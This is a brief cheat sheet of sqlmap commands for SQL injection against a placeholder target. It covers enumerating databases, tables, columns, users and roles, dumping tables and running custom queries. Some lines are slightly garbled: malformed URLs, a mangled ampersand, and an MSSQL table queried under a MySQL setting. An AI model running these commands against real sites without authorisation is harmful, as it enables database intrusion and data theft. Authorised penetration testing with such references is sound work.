Sqlmap Cheatsheet
NOTE : for each command using --dbms=mysql. — — CHEAT SHEET — — # Enum DB sqlmap --dbms=mysql -u “http//domain/" --dbs # Enum tables sqlmap --dbms=mysql -u “http//domain/" -D target_DB --tables --current-user : enum current user --current-db : enum db name # Use POST methods sqlmap --dbms=mysql -u “http//domain/" --data=”data1=aaa&data2=bbb” # List of users and roles sqlmap --dbms=mysql -u “http//domain/" --users --roles --threads=10 # Custom Query sqlmap --dbms=mysql -u “http//domain/" --sql-query=”select * from master.sys.server_principals” # Dump table sqlmap --dbms=mysql -u “http//domain/" -D target_DB -T target_Table --dump # List columns sqlmap --dbms=mysql -u “http//domain/" -D target_DB -T target_Table --columns # Parameter sqlmap --dbms=mysql -u “http//.domain/param1=value1¶m2=value2" --dbs -p param2 # Specify URIs sqlmap --dbms=mysql -u “http//.domain/param1/value1*/param2/value2" ...